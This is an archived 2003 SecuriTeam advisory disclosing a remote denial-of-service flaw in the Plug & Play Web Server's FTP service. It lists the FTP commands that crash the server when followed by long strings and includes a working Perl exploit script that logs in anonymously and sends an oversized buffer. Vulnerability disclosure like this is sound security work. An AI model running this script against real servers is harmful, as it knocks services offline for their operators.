[NT] Denial of Service in Plug and Play's FTP Server

• Previous message: SecuriTeam: "[EXPL] Solaris SADMIND Exploitation (Single UDP Packet, MetaSploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 21 Sep 2003 13:14:08 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Denial of Service in Plug and Play's FTP Server
------------------------------------------------------------------------

SUMMARY

The <http://www.pandpsoftware.com> Plug and Play Web Server "provides all
of the tools you need to host your own website. The tools are bundled
together in one comprehensive software package that it is incredibly easy
to use and maintain". Multiple vulnerabilities have been found in the
product's FTP server allowing remote attackers to cause the service to
crash.

DETAILS

Vulnerable systems:
 * Plug & Play Web Server version 1.0002c

A vulnerability has been identified in Plug & Play Web (FTP) server, which
allows malicious users to remotely crash the server. By connecting to the
server and issuing a command (dir, ls, delete, mkdir, DELE, RMD, MKD)
followed by large amounts of data, the server crashes.

dir [Ax509]
ls [Ax509]
delete [Ax509]
mkdir [Ax509]
DELE [Ax509]
RMD [Ax509]
MKD [Ax509]

Vendor status:
The vendor has been informed, and they are fixing this bug. The updated
version, when released, can be downloaded from:
<http://www.pandpsoftware.com/download.htm>
http://www.pandpsoftware.com/download.htm.

Exploit:
#!/usr/bin/perl
# ppftpdos.pl - Remote denial of service against Plug & Play FTP server

use Net::FTP;

$host = $ARGV[0];

$buffer = "A"x540;

if("$ARGV[0]" eq "") {
        print("DOS against Plug & Play FTP Server by Bahaa Naamneh\n");
        print("b_naamneh@hotmail.com - http://www.bsecurity.tk\n");
        print("====================================================\n");
        die("Usage : ./PPftpdos <host\/ip>\n");
} else {

        print("Connecting to $host...\n");
        my $ftp = Net::FTP->new($host) or die "Couldn't connect to
$host\n";
        print("Connected!\n");

        $username = "anonymous";
        $password = "anonymous";

        $ftp->login($username, $password)
        or die "Could not log in.\n";

        $ftp->dir($buffer);

        $ftp->quit();

        print("Success!\n");
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:b_naamneh@hotmail.com> Bahaa
Naamneh.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[EXPL] Solaris SADMIND Exploitation (Single UDP Packet, MetaSploit)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]